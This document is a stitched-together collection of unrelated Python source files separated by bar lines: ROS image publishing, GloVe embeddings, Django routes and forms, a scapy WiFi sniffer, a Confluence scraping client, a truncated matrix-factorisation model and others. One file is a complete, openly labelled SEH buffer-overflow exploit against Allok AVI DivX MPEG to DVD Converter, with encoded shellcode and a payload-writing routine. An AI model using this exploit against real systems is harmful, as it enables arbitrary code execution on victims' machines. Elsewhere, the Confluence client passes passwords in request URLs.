# export obtained dataframe to csv
df.to_csv("../timestamps.csv")
# open plot using default browser
show(plot)
|
import rospy
import os
from sensor_msgs.msg import CameraInfo, Image
__all__ = ('ImagePublisher',)
class ImagePublisher:
"""Wrapper to publish images to a topic."""
def __init__(self, topic, frame_id, camera_info, queue_size=None):
"""[summary]
Arguments:
topic {str} -- image topic
frame_id {str} -- camera frame_id
camera_info (CameraInfo) -- camera info
Keyword Arguments:
            queue_size {int} -- The queue size used for asynchronous publishing (default: {None})
"""
self._topic = topic
self._frame_id = frame_id
self._camera_info = camera_info
self._image_pub = rospy.Publisher(
topic + '/image', Image, queue_size=queue_size)
self._camera_info_pub = rospy.Publisher(
topic + '/camera_info', CameraInfo, queue_size=queue_size)
def publish(self, image, encoding='passthrough'):
"""Publish image.
Arguments:
image {numpy.ndarray} -- image data
Keyword Arguments:
encoding {str} -- desired encoding (default: {'passthrough'})
"""
msg = _array_to_imgmsg(image, encoding)
msg.header.stamp = rospy.Time.now()
msg.header.frame_id = self._frame_id
self._image_pub.publish(msg)
self._camera_info_pub.publish(self._camera_info)
def get_num_connections(self):
"""Get the number of connections to other ROS nodes for this topic.
Returns:
int -- number of connections
"""
return self._image_pub.get_num_connections()
def _array_to_imgmsg(img_array, encoding):
assert len(img_array.shape) == 3
img_msg = Image()
img_msg.height = img_array.shape[0]
img_msg.width = img_array.shape[1]
if encoding == 'passthrough':
img_msg.encoding = '8UC3'
else:
img_msg.encoding = encoding
if img_array.dtype.byteorder == '>':
img_msg.is_bigendian = True
    img_msg.data = img_array.tobytes()
img_msg.step = len(img_msg.data) // img_msg.height
return img_msg
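# A minimal usage sketch (node name, topic and the blank test frame are illustrative;
# a running ROS master and a populated CameraInfo are assumed):
#
#   import numpy as np
#   rospy.init_node('image_publisher_example')
#   pub = ImagePublisher('camera', 'camera_link', CameraInfo(), queue_size=1)
#   pub.publish(np.zeros((480, 640, 3), dtype=np.uint8), encoding='bgr8')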
|
import sys
sys.path.append('../')
import config as cf
from word_feature.utils import get_unique_word, read_caption_clean_file, map_w2id
import numpy as np
def load_glove(path):
"""
    Return a dict mapping each word to its embedding coefficient vector.
"""
f = open(path, encoding='utf-8')
print("Loading the /{}/ vector".format(path.split('/')[-1]))
embeddings_index = {}
for line in f:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
return embeddings_index
def make_word_matrix(str_list, glove_path = 'database/glove.6B.200d.txt'):
# FIXME
"""
    Build the embedding matrix for the vocabulary extracted from str_list.
"""
idxtoword, wordtoidx, vocab_size = map_w2id(str_list)
embeddings_index = load_glove(glove_path)
embedding_matrix = np.zeros((vocab_size, cf.embedding_dim))
for word, i in wordtoidx.items():
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
# Words not found in the embedding index will be all zeros
embedding_matrix[i] = embedding_vector
# Find what to return #
return embedding_matrix
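# A minimal usage sketch (the caption list and GloVe path are illustrative; the real
# captions come from read_caption_clean_file and cf.embedding_dim must match the
# dimensionality of the chosen GloVe file):
#
#   captions = ['a dog runs on the grass', 'a man rides a horse']
#   embedding_matrix = make_word_matrix(captions, glove_path='database/glove.6B.200d.txt')
#   print(embedding_matrix.shape)   # (vocab_size, cf.embedding_dim)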
|
"""instagram URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url,include
from users import views as user_views
from django.contrib.auth import views
urlpatterns = [
url('admin/', admin.site.urls),
url(r'',include('feed.urls')),
url(r'^accounts/register',user_views.register_user,name='register_user' ),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'}),
url(r'^users/not-following/$',user_views.not_following,name='not_following'),
url(r'^users/add/following/(\d+)$',user_views.add_following,name='add_following'),
url(r'^users/remove/following/(\d+)$',user_views.remove_following,name='remove_following'),
url(r'^users/my-profile/$',user_views.my_profile,name='my_profile'),
url(r'^users/edit_profile/$',user_views.edit_profile, name ='edit_profile'),
url(r'users/search/', user_views.search_users, name='search_users'),
]
|
from django import forms
from .models import Procedure,Profile
class ProcedureForm(forms.ModelForm):
class Meta:
model = Procedure
exclude = ['user','user_procedure_id']
class ProfileForm(forms.ModelForm):
class Meta:
model = Profile
exclude = ['prof_user','profile_Id']
class VoteForm(forms.ModelForm):
class Meta:
model = Procedure
fields = ('process','steps')
|
#!/usr/bin/env python
import threading
from scapy.all import *
import subprocess as sp
import Queue
import time
class Sniffer(threading.Thread):
def __init__(self, queue, *args, **kwargs):
threading.Thread.__init__(self, *args, **kwargs)
self.__queue = queue
sp.Popen(['hostapd', '/etc/hostapd/hostapd.conf'])
def run(self):
def record(packet, ignore = set()):
self.__queue.put(("WiFi", packet.src, time.time()))
sniff(prn=record)
|
# ------------------------------------------------------------------------------
# Created by Tyler Stegmaier
# Copyright (c) 2020.
#
# ------------------------------------------------------------------------------
from typing import List, Tuple
from ..Widgets.base import *
__all__ = ['Style']
class Style(ttk.Style):
def Configure_Root(self, background: str, foreground: str, selected: str, active: str, font: str):
self.configure('.', background=background, foreground=foreground, font=font)
self.map('.', background=[('selected', selected), ('active', active)])
def Configure_NotebookTab(self, background: str, foreground: str, selected: str, active: str, font: str, padding: Tuple[int, int]):
self.configure('TNotebook.Tab', background=background, foreground=foreground)
self.map('TNotebook.Tab', background=[('selected', selected), ('active', active)])
self.theme_settings(self.CurrentTheme, { "TNotebook.Tab": { "configure": { "padding": padding, 'font': font } } })
@property
def Themes(self) -> List[str]: return self.theme_names()
@property
def CurrentTheme(self): return self.theme_use()
@CurrentTheme.setter
def CurrentTheme(self, theme: str): self.theme_use(theme)
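# A minimal usage sketch (colour values and font are illustrative; a Tk root window
# must already exist before a ttk.Style can be configured):
#
#   style = Style()
#   style.Configure_Root(background='#282828', foreground='#f0f0f0',
#                        selected='#404040', active='#505050', font='Arial 10')
#   style.CurrentTheme = 'clam'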
|
import sys
import pytest
if __name__ == "__main__":
repeat_times = 3
for index, arg in enumerate(sys.argv):
if arg == '-n':
repeat_times = int(sys.argv[index + 1])
pytest.main(['--repeat-count=%s' % repeat_times, 'test_hilauncher_gfx.py'])
|
#!/usr/bin/env python
#
# Exploit Title : Allok AVI DivX MPEG to DVD Converter - Buffer Overflow (SEH)
# Date : 3/27/18
# Exploit Author : wetw0rk
# Vulnerable Software : Allok AVI DivX MPEG to DVD Converter
# Vendor Homepage : http://alloksoft.com/
# Version : 2.6.1217
# Software Link : http://alloksoft.com/allok_avimpeg2dvd.exe
# Tested On : Windows 10 , Windows 7 (x86-64)
#
# Greetz : Paul, Sally, Nekotaijutsu, mvrk, abatchy17
#
# Trigger the vulnerability by:
# Copy text file contents -> paste into "License Name" -> calc
#
shellcode = "\x90" * 20 # nop sled
shellcode += ( # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d" -f c
"\xd9\xe9\xd9\x74\x24\xf4\xbe\x4b\x88\x2c\x8f\x58\x31\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x70\x14\x03\x70\x5f\x6a\xd9\x73\xb7\xe8"
"\x22\x8c\x47\x8d\xab\x69\x76\x8d\xc8\xfa\x28\x3d\x9a\xaf\xc4"
"\xb6\xce\x5b\x5f\xba\xc6\x6c\xe8\x71\x31\x42\xe9\x2a\x01\xc5"
"\x69\x31\x56\x25\x50\xfa\xab\x24\x95\xe7\x46\x74\x4e\x63\xf4"
"\x69\xfb\x39\xc5\x02\xb7\xac\x4d\xf6\x0f\xce\x7c\xa9\x04\x89"
"\x5e\x4b\xc9\xa1\xd6\x53\x0e\x8f\xa1\xe8\xe4\x7b\x30\x39\x35"
"\x83\x9f\x04\xfa\x76\xe1\x41\x3c\x69\x94\xbb\x3f\x14\xaf\x7f"
"\x42\xc2\x3a\x64\xe4\x81\x9d\x40\x15\x45\x7b\x02\x19\x22\x0f"
"\x4c\x3d\xb5\xdc\xe6\x39\x3e\xe3\x28\xc8\x04\xc0\xec\x91\xdf"
"\x69\xb4\x7f\xb1\x96\xa6\x20\x6e\x33\xac\xcc\x7b\x4e\xef\x9a"
"\x7a\xdc\x95\xe8\x7d\xde\x95\x5c\x16\xef\x1e\x33\x61\xf0\xf4"
"\x70\x9d\xba\x55\xd0\x36\x63\x0c\x61\x5b\x94\xfa\xa5\x62\x17"
"\x0f\x55\x91\x07\x7a\x50\xdd\x8f\x96\x28\x4e\x7a\x99\x9f\x6f"
"\xaf\xfa\x7e\xfc\x33\xd3\xe5\x84\xd6\x2b"
)
offset = "A" * 780
nSEH = "\x90\x90\xeb\x06" # jmp +0x06
SEH = "\x30\x45\x01\x10" # pop edi, pop esi, ret [SkinMagic.dll]
trigger = "D" * (50000 - len(# trigger the vuln (plenty of space!!!)
offset +
nSEH +
SEH +
shellcode
)
)
payload = offset + nSEH + SEH + shellcode + trigger
fd = open("pasteME.txt", "w")
fd.write(payload)
fd.close()
|
from API_operaciones.mysql_connection import app
from API_operaciones.mysql_connection import mysql2 as mysql
from API_operaciones.bd_descripcion import pimcBD
import MySQLdb
def eliminarElemento(elementoRelacional, parametrosJSON):
cur = mysql.cursor()
if (not pimcBD.tablaExiste(elementoRelacional)):
raise ValueError("elementoRelacional No Existe")
return None
if (not isinstance(parametrosJSON, dict)):
raise ValueError("parametrosJSON no es dictionario")
return None
if (parametrosJSON == {}):
raise ValueError("parametrosJSON vacios")
return None
idElementoRelacional = pimcBD.obtenerTablaId(elementoRelacional)
if idElementoRelacional:
if idElementoRelacional in parametrosJSON:
idValor = parametrosJSON[idElementoRelacional]
            # Initialize the DELETE query
query = '''DELETE FROM %s WHERE %s = %d '''
try:
numEntradasBorradas = cur.execute(query % (elementoRelacional, idElementoRelacional, int(idValor)))
mysql.commit()
return numEntradasBorradas
except (MySQLdb.Error, MySQLdb.Warning) as e:
raise ValueError("MYSQL ERROR = ", str(e))
return None
else:
raise ValueError("ID Invalido para elemento relacional")
return None
else:
raise ValueError("ID invalido para elemento relacional")
return None
|
import json
import logging
import re
import unicodedata
import backoff
import dateutil.parser
from bs4 import BeautifulSoup, NavigableString
from urllib import request, parse, error
logger = logging.getLogger(__name__)
class ConfluenceAPI(object):
"""Confluence API Class
This class acts as an API bridge between python and the confluence API.
"""
empty_contents = ['', ',', '.', ' ']
host = None
__username = None
__password = None
@classmethod
def setup(cls, config):
cls.host = config['confluence']['host']
cls.__username = config['confluence']['username']
cls.__password = config['confluence']['password']
@classmethod
@backoff.on_exception(backoff.expo, (error.URLError, error.ContentTooShortError, ConnectionResetError, ConnectionRefusedError, ConnectionAbortedError, ConnectionError), max_tries=8)
def __make_rest_request(cls, api_endpoint, content_id, url_params):
"""Low level request abstraction method.
This method will make a request to the Confluence API and return the response directly to the caller.
Args:
api_endpoint (str): The endpoint on the rest api to call.
content_id (str): The id of the content to retrieve.
url_params (dict): A dictionary of url params.
Returns:
dict: Returns the response from the server.
"""
params = parse.urlencode(
{**url_params, 'os_username': cls.__username, 'os_password': cls.__password})
url = cls.host + '/rest/api/' + api_endpoint + '/' + content_id + '?%s' % params
logger.debug('make_rest_request: URL requested : %s' % url)
try:
return json.loads(unicodedata.normalize("NFKD", request.urlopen(url).read().decode('utf-8')))
except error.HTTPError as e:
logger.error(e)
return e
except:
logger.error(
"__make_rest_request: Error making request with id: %s" % content_id)
return
@classmethod
@backoff.on_exception(backoff.expo, (error.URLError, error.ContentTooShortError, ConnectionResetError, ConnectionRefusedError, ConnectionAbortedError, ConnectionError), max_tries=8)
def __make_master_detail_request(cls, url_params):
"""Low level request abstraction method.
This method will make a request to the Confluence API master details page and return the response directly to
the caller.
Args:
url_params (dict): A dictionary of url params.
Returns:
dict: Returns the response from the server.
"""
params = parse.urlencode(
{**url_params, 'os_username': cls.__username, 'os_password': cls.__password})
url = cls.host + '/rest/masterdetail/1.0/detailssummary/lines' + '?%s' % params
logger.debug('make_master_detail_request: URL requested: %s' % url)
try:
return json.loads(unicodedata.normalize("NFKD", request.urlopen(url).read().decode('utf-8')))
except error.HTTPError as e:
return e
except:
logger.error(
"__make_master_detail_request: Error retrieving master details.")
@classmethod
def __extract_heading_information(cls, content, heading):
"""Extracts all information beneath a heading.
This method extracts all information beneath a heading.
Args:
content (str): The content to extract the text from.
heading (str): The heading to extract the information below.
Returns:
dict: The extracted text in the heading.
"""
logger.debug(
'extract_heading_information: Heading to extract information from: %s' % heading)
html = BeautifulSoup(content, 'html.parser')
heading_container = ''
try:
heading_container = str(
html.find(string=heading).parent.next_sibling)
except:
logger.warning(
                '__extract_heading_information: The following heading does not exist for the content provided: %s' % heading)
return ConfluenceAPI.__handle_html_information(heading_container, heading)
@classmethod
def __extract_page_information(cls, content, page):
"""Extracts all information from a page.
This method extracts all the text information from a page.
Args:
content (str): The content to extract the text from.
page (str): The title of the page that the information was taken from.
Returns:
dict: The extracted text.
"""
return ConfluenceAPI.__handle_html_information(content, page)
@classmethod
def __extract_page_properties_from_page(cls, content, label):
"""Extracts the page properties macro.
This method will extract the page properties macro from the confluence 'body.storage' content. Unfortunately due
to complexity, this method is yet to be written and should not be used.
Args:
content (str): The content to abstract the k-v pairs from.
label (str): The label given to the page_properties.
Returns:
dict: The page properties as key value pairs.
"""
# TODO: WRITE METHOD
return {content: label}
@classmethod
def __extract_page_properties(cls, content):
"""Extracts the page properties macro.
This method will extract the page properties macro. This method assumes that the content is in the format
returned by the make_master_details_request method.
Args:
content (dict): The content to abstract the k-v pairs from.
Returns:
dict: The page properties as key value pairs.
"""
if len(content['detailLines']) > 0:
keys = []
for k in content['renderedHeadings']:
keys.append(BeautifulSoup(k, 'html.parser').getText().strip())
values = []
# Get all possible details and overwrite the values of previous details if there is more
# information in the page properties currently being processed.
for detailLine in content['detailLines']:
details = []
for detail in detailLine['details']:
details.append(
ConfluenceAPI.__recursive_html_handler(detail))
if (len(values) < len(details)):
values = details.copy()
else:
for i, value in enumerate(details):
# Copy across the value from the details if more information is present
# otherwise ignore this copy.
if len(values[i]) == 0 or values[0] == '':
values[i] = value
page_properties = dict(zip(keys, values))
page_properties.pop('', None)
# Split columns with name (upi) into two separate properties.
page_properties_modified = page_properties.copy()
for k, v in page_properties.items():
names = []
upis = []
for val in v:
if type(val) is str:
if re.match(".+ \([a-z]{4}\d{3}\)", val):
user = re.findall("(.*) \((.*)\)", val)
if len(user) > 0:
names.append(user[0][0])
upis.append(user[0][1])
if len(names) > 0:
page_properties_modified[k] = names
page_properties_modified[k + "_UPIS"] = upis
# Remove empty key value pairs from dictionary.
keys = []
values = []
for k, v in page_properties_modified.items():
vals = []
for val in v:
if type(val) is str:
if val.replace(' ', '') not in ConfluenceAPI.empty_contents:
vals.append(val)
else:
vals.append(val)
if len(vals) > 0:
values.append(vals)
keys.append(k)
page_properties_modified = dict(zip(keys, values))
return page_properties_modified
else:
return {}
@classmethod
def __extract_panel_information(cls, content, panel):
"""Extracts panel information given some content.
Args:
content (str): The content to abstract the panel information from.
panel (str): The panel identifier.
Returns:
dict: The extracted panel information
"""
logger.debug(
'extract_panel_information: Panel to extract information from: %s' % panel)
html = BeautifulSoup(content, 'html.parser')
panel_container = ''
try:
panel_container = str(
html.find('b', string=panel).parent.next_sibling)
except:
logger.warning(
                '__extract_panel_information: The following panel does not exist for the content provided: %s' % panel)
return ConfluenceAPI.__handle_html_information(panel_container, panel)
@classmethod
def get_homepage_id_of_space(cls, space):
"""Gets the homepage id of a space.
Args:
space (int): id of the space.
Returns:
int: The space homepage id.
"""
response = ConfluenceAPI.__make_rest_request('space', space, {})
logger.debug('get_homepage_id_of_space: %s has id of %d' %
(space, int(response['_expandable']['homepage'].replace('/rest/api/content/', ''))))
return int(response['_expandable']['homepage'].replace('/rest/api/content/', ''))
@classmethod
def get_last_update_time_of_content(cls, content_id):
"""Gets the last update time provided some content_id.
Args:
content_id (int): The id of the content to check the last update time for.
Returns:
datetime.datetime: The last update time.
"""
response = ConfluenceAPI.__make_rest_request(
'content', str(content_id), {'expand': 'version'})
return dateutil.parser.parse(response['version']['when'])
@classmethod
def get_page_labels(cls, content_id):
"""Gets a pages labels.
Args:
content_id(int): The id of the page to get labels of.
Returns:
labels: The labels of the page.
"""
labels = []
for label in ConfluenceAPI.__make_rest_request('content', str(content_id) + '/label', {})['results']:
labels.append(label['name'])
return labels
@classmethod
def get_page_content(cls, content_id):
"""Gets the page content.
This method acts as an alias for the make_rest_request but returns only the body of the page.
Args:
content_id(int): The id of the page to the content of.
Returns:
str: The body of the page.
"""
return ConfluenceAPI.__make_rest_request('content', str(content_id), {'expand': 'body.view'})['body']['view']['value']
@classmethod
def get_panel(cls, content, panel, space_id):
"""Gets a panels information
This method also performs cleanup on the Overview panel from the APPLCTN space.
Args:
content (str): The content to search in.
panel (str): Name of the panel to retrieve information for.
space_id (int): id of the space the information is coming from.
Returns:
dict: The information from the panel.
"""
panel_info = ConfluenceAPI.__extract_panel_information(content, panel)
if panel == 'Overview' and space_id == 65013279:
overview = {'Overview': ['']}
for info in panel_info['Overview']:
if type(info) is str:
overview['Overview'][0] = overview['Overview'][0] + info
else:
overview['Overview'].append(info)
temp = overview['Overview'][0].split(
'The application is accessible from these locations')
overview['Overview'][0] = temp[0]
return overview
return panel_info
@classmethod
def get_heading(cls, content, heading):
"""Gets a heading information
Args:
content (str): The content to search in.
heading (str): Name of the heading to retrieve information for.
Returns:
dict: The information from the heading.
"""
return ConfluenceAPI.__extract_heading_information(content, heading)
@classmethod
def get_page(cls, content, page_title):
"""Gets a whole pages information
Args:
content (str): The content to search in.
page_title (str): The name of the page.
Returns:
dict: The information from the page.
"""
return ConfluenceAPI.__extract_page_information(content, page_title)
@classmethod
def get_page_properties(cls, content_id, space_key, labels):
"""Gets page properties information
Args:
content_id (int): The id of the content page to retrieve the page properties from.
space_key (str): The name of the space this page exists in.
labels (list): A list of labels that the page should meet.
Returns:
dict: The page properties.
"""
cql = 'label in ('
for label in labels[:-1]:
cql += "'" + label + "',"
cql += "'" + labels[-1] + "') "
cql += 'AND id = ' + str(content_id)
return ConfluenceAPI.__extract_page_properties(ConfluenceAPI.__make_master_detail_request({'cql': cql, 'spaceKey': space_key}))
@classmethod
def check_page_exists(cls, page_id):
result = ConfluenceAPI.__make_rest_request('content', str(page_id), {})
if type(result) is not error.HTTPError:
return True
else:
if result.code == 404:
return False
else:
logger.info(
"check_page_exists: Unknown error for page with id: %s" % str(page_id))
return True
@classmethod
def get_page_urls(cls, content_id, url_type):
"""Gets page urls
Args:
content_id (int): The id of the content page to retrieve the urls for.
url_type (str): The url type that the user has requested.
Returns:
str: The page url.
"""
result = ConfluenceAPI.__make_rest_request(
'content', str(content_id), {})['_links']
return result['base'] + result[url_type]
@classmethod
def get_child_page_ids(cls, parent_id):
"""Gets the child page id's given a parent page id.
Args:
parent_id (int): Id of the parent page to get the children of.
# child_filter (str): cql filter to apply to retrieve only child pages that match the filter.
Returns:
list: A list of all the child ids of the parent page.
"""
page = 0
size = 25
children_id = {}
while size == 25:
response = ConfluenceAPI.__make_rest_request('content', str(parent_id) + '/child/page',
{'start': page, 'limit': 25, 'size': size,
'expand': 'version'})
results = response['results']
size = response['size']
page += response['size']
for result in results:
children_id[int(result['id'])] = {
'name': result['title'], 'last_updated': dateutil.parser.parse(result['version']['when'])}
return children_id
@classmethod
def __handle_html_information(cls, content, content_name):
"""Handles html information
This method will handle the HTML input, returning it as a dictionary.
Args:
content (str): The content to turn into a usable dictionary.
content_name (str): The name/heading/label associated with the content.
Returns:
dict: A usable dictionary that contains the content only (no HTML).
"""
return {content_name: ConfluenceAPI.__recursive_html_handler(content)}
@classmethod
def __recursive_html_handler(cls, content):
"""Handles html information
This method will handle the HTML input, returning it as a dictionary.
Args:
content (str): The content to turn into a usable dictionary.
Returns:
list: A list dictionary that contains the content only (no HTML).
"""
# Remove all newline characters and remove all spaces between two tags.
content = re.sub('>+\s+<', '><', content.replace('\n', ''))
heading = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7']
supported_tags = ['p', 'span', 'h1', 'h2', 'h3',
'h4', 'h5', 'h6', 'h7', 'a', 'ul', 'table']
content_list = []
html = BeautifulSoup(content, 'html.parser')
# Go down the hierarchy until we are at a non-div element.
contents = html
if contents.contents:
while contents.contents[0].name == 'div':
contents = contents.contents[0]
# Look at each of the provided html's children tags and handle data for different cases.
for tag in contents.children:
# Check if previous sibling was a heading.
if tag.previous_sibling:
if tag.previous_sibling.name in heading:
continue
# Making sure we are at the lowest element in the current tag.
while tag.name == 'div':
tag = tag.contents[0]
if tag.name == 'ul':
# List handling
for child in tag.children:
child_to_insert = child.getText().strip()
if child.find('table', recursive=False):
child_to_insert = ConfluenceAPI.__recursive_html_handler(
str(child.find('table', recursive=False)))
if child.find('ul', recursive=False):
child_to_insert = ConfluenceAPI.__recursive_html_handler(
str(child.find('ul', recursive=False)))
if child_to_insert not in ConfluenceAPI.empty_contents:
content_list.append(child_to_insert)
elif tag.name == 'table':
# Table handling.
table = tag.find('tbody')
horizontal_headings = []
vertical_heading = None
table_dict = {}
for row in table.children:
# noinspection PyBroadException
try:
current_column = 0
headings_only_row = not row.find('td')
for data in row.children:
if headings_only_row:
horizontal_headings.append(
data.getText().strip())
else:
# Data could be a heading or actual data depending on layout of
# table.
if data.name == 'th':
vertical_heading = data.getText().strip()
else:
data_to_insert = data.getText().strip()
if data.find('table', recursive=False):
data_to_insert = ConfluenceAPI.__recursive_html_handler(
str(data.find('table', recursive=False)))
if data.find('ul', recursive=False):
data_to_insert = ConfluenceAPI.__recursive_html_handler(
str(data.find('ul', recursive=False)))
if data_to_insert not in ConfluenceAPI.empty_contents:
if len(horizontal_headings) == 0 and vertical_heading is None:
# Dealing with a completely flat table.
content_list.append(data_to_insert)
elif len(horizontal_headings) == 0:
if vertical_heading in table_dict:
table_dict[vertical_heading].append(
data_to_insert)
else:
table_dict[vertical_heading] = [
data_to_insert]
elif vertical_heading is None:
if horizontal_headings[current_column] in table_dict:
table_dict[horizontal_headings[current_column]].append(
data_to_insert)
else:
table_dict[horizontal_headings[current_column]] = [
data_to_insert]
else:
if horizontal_headings[current_column] in table_dict:
if vertical_heading in table_dict[horizontal_headings[current_column]]:
table_dict[horizontal_headings[current_column]][vertical_heading].append(
data_to_insert)
else:
table_dict[horizontal_headings[current_column]][vertical_heading] = [
data_to_insert]
else:
table_dict[horizontal_headings[current_column]] = {
vertical_heading: [data_to_insert]}
current_column += 1
except:
logger.error(
'recursive_html_handler: Unable to parse table: %s', tag.getText().strip())
if table_dict != {}:
content_list.append(table_dict)
elif tag.name in heading:
heading_to_insert = tag.getText().strip()
heading_content = ConfluenceAPI.__recursive_html_handler(
str(tag.next_sibling))
content_list.append({heading_to_insert: heading_content})
elif tag.name in supported_tags:
information_to_insert = tag.getText().strip()
if tag.find('table', recursive=False):
information_to_insert = ConfluenceAPI.__recursive_html_handler(
str(tag.find('table', recursive=False)))
if tag.find('ul', recursive=False):
information_to_insert = ConfluenceAPI.__recursive_html_handler(
str(tag.find('ul', recursive=False)))
# Content does not contain any lists, tables or links to a user so just return the information.
if tag.find('a', class_='user-mention') or 'data-username' in tag.attrs:
if tag.find('a', class_='user-mention'):
for user in tag.find_all('a', class_='user-mention'):
if user.string is not None and 'data-username' in user.attrs:
content_list.append(user.string + " (" + user.attrs['data-username'] + ")")
else:
content_list.append(
tag.string + " (" + tag.attrs['data-username'] + ")")
else:
if information_to_insert not in ConfluenceAPI.empty_contents:
content_list.append(information_to_insert)
elif type(tag) is NavigableString:
content_list.append(str(tag.string).strip())
return content_list
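# A minimal usage sketch (host, credentials and space key are placeholders; adjust to
# your own Confluence instance before running):
#
#   ConfluenceAPI.setup({'confluence': {'host': 'https://confluence.example.com',
#                                       'username': 'user',
#                                       'password': 'secret'}})
#   homepage_id = ConfluenceAPI.get_homepage_id_of_space('SPACEKEY')
#   body_html = ConfluenceAPI.get_page_content(homepage_id)
#   overview = ConfluenceAPI.get_heading(body_html, 'Overview')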
|
import setuptools
setuptools.setup(
name="pycef",
version="1.0",
author="Bubba",
author_email="bubbapy@protonmail.ch",
description="A py wrapper for close ended fund connect portal",
long_description='Rough API around cefconnect.com via web scraping',
long_description_content_type="text/markdown",
url="https://github.com/pypa/sampleproject",
packages=setuptools.find_packages(),
classifiers=(
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
),
)
|
# _*_ coding: utf-8 _*_
"""
Time: 2021/7/22 17:29
Author: WANG Bingchen
Version: V 0.1
File: model.py
Describe:
"""
from .lossFunc import *
from .initialParams import *
import pandas as pd
from .optimize import CVOptimize, FanoOptimize, CCVOptimize
from . import utiles
from .cell_circle import CellCircle
import warnings
warnings.filterwarnings("ignore")
class SMURF():
def __init__(self, n_features=20, steps=10, alpha=1e-5, eps=10, noise_model="Fano", normalize=True, calculateIntialNoiseFactor=False, estimate_only=False):
self.K = n_features
self.batchSize = n_features * 10
self.steps = steps
self.alpha = alpha
self.eps = eps
self.normalize = normalize
self.noise_model = noise_model
self.calculateLossFunc = True
self.estmate_only = estimate_only
self.calculateIntialNoiseFactor = calculateIntialNoiseFactor
def _check_params(self):
"""Check parameters
This allows us to fail early - otherwise certain unacceptable
parameter choices, such as n='10.5', would only fail after
minutes of runtime.
Raises
------
ValueError : unacceptable choice of parameters
"""
utiles.check_positive(n_features=self.K, eps=self.eps, batchsize=self.batchSize, alpha=self.alpha,
steps=self.steps)
utiles.check_int(n_features=self.K, steps=self.steps)
utiles.check_between(v_min=0, v_max=min(self.genes, self.cells), n_features=self.K)
utiles.check_bool(normalize=self.normalize)
utiles.check_bool(iteration=self.calculateIntialNoiseFactor)
utiles.check_noise_model(noise_model=self.noise_model)
def MFConstantVariance(self):
G = self.G
H = self.H
A = self.A
u = np.dot(G, H)
Vc = np.ones((1, self.cells)) * 1.0
if self.calculateIntialNoiseFactor:
Vg = getv(self.A, u)
v = np.dot(Vg, Vc)
else:
Vg = np.ones((self.genes, 1))
v = np.dot(Vg, Vc)
LossFuncGre = 0
LossFunc = 0
Lossf = []
nonZerosInd = np.nonzero(A)
numNonZeros = nonZerosInd[0].size
nonZeroElem = np.concatenate((nonZerosInd[0].reshape(numNonZeros, 1), nonZerosInd[1].reshape(numNonZeros, 1)),
axis=1)
for step in range(self.steps):
if self.calculateLossFunc:
for element in nonZeroElem:
g = element[0]
c = element[1]
LossFuncCG = LossFunctionConstantVariance(u[g][c], v[g][c], A[g][c], G, H, g, c)
LossFunc = LossFunc + LossFuncCG
else:
LossFunc = (step+1)*(self.eps+1)
if abs(LossFunc - LossFuncGre) < self.eps:
Lossf.append(LossFunc)
print("already converge")
break
else:
Lossf.append(LossFunc)
LossFuncGre = LossFunc
LossFunc = 0
np.random.shuffle(nonZeroElem)
batchElements = nonZeroElem[0:self.batchSize - 1, :]
for element in batchElements:
g = element[0]
c = element[1]
if u[g][c] <= 0.01:
u[g][c] = 0.01
if Vg[g][0] <= 1e-09:
Vg[g][0] = 1e-09
dG, dH, dVg = CVOptimize(A, G, H, u, Vg, Vc, v, g, c)
G[g, :] = G[g, :] + self.alpha * dG
H[:, c] = H[:, c] + self.alpha * dH
Vg[g, :] = Vg[g, :] + self.alpha * dVg
u = np.dot(G, H)
v = np.dot(Vg, Vc)
print("number of iteration: ", step+1, "/", self.steps)
u = np.dot(G, H)
u[u < 0] = 0
return u, G, H
def MFFano(self):
G = self.G
H = self.H
A = self.A
u = np.dot(G, H)
bc = np.ones((1, self.cells)) * 1.0
if self.calculateIntialNoiseFactor:
bg = getb(self.A, u)
else:
bg = np.ones((self.genes, 1)) * 1.0
b = np.dot(bg, bc)
LossFunc = 0
LossFuncGre = 0
Lossf = []
nonZerosInd = np.nonzero(A)
numNonZeros = nonZerosInd[0].size
nonZeroElem = np.concatenate((nonZerosInd[0].reshape(numNonZeros, 1), nonZerosInd[1].reshape(numNonZeros, 1)),
axis=1)
for step in range(self.steps):
if self.calculateLossFunc:
for element in nonZeroElem:
g = element[0]
c = element[1]
LossFuncCG = LossFunctionFano(u[g][c], b[g][c], A[g][c], G, H, g, c)
LossFunc = LossFunc + LossFuncCG
else:
LossFunc = (step + 1)*self.eps
if abs(LossFunc - LossFuncGre) < self.eps:
Lossf.append(LossFunc)
print("already converge")
break
else:
Lossf.append(LossFunc)
LossFuncGre = LossFunc
LossFunc = 0
np.random.shuffle(nonZeroElem)
batchElements = nonZeroElem[0:self.batchSize - 1, :]
for element in batchElements:
g = element[0]
c = element[1]
if u[g][c] <= 0.01:
u[g][c] = 0.01
if bg[g][0] <= 1e-09:
bg[g][0] = 1e-09
b[g][c] = np.dot(bg[g, :], bc[:, c])
dG, dH, dbg = FanoOptimize(A, G, H, u, bg, bc, b, g, c)
G[g, :] = G[g, :] + self.alpha * dG
H[:, c] = H[:, c] + self.alpha * dH
bg[g, :] = bg[g, :] + self.alpha * dbg
u = np.dot(G, H)
b = np.dot(bg, bc)
            self.alpha = self.alpha*(1 - (float(step)/float(self.steps)))
print("number of iteration: ", step+1, "/", self.steps)
u = np.dot(G, H)
u[u < 0] = 0
return u, G, H
def MFConstCoeffiVariation(self):
G = self.G
H = self.H
A = self.A
u = np.dot(G, H)
ac = np.ones((1, self.cells))
if self.calculateIntialNoiseFactor:
ag = geta(self.A, u)
else:
ag = np.ones((self.genes, 1))
a = np.dot(ag, ac)
LossFunc = 0
LossFuncGre = 0
Lossf = []
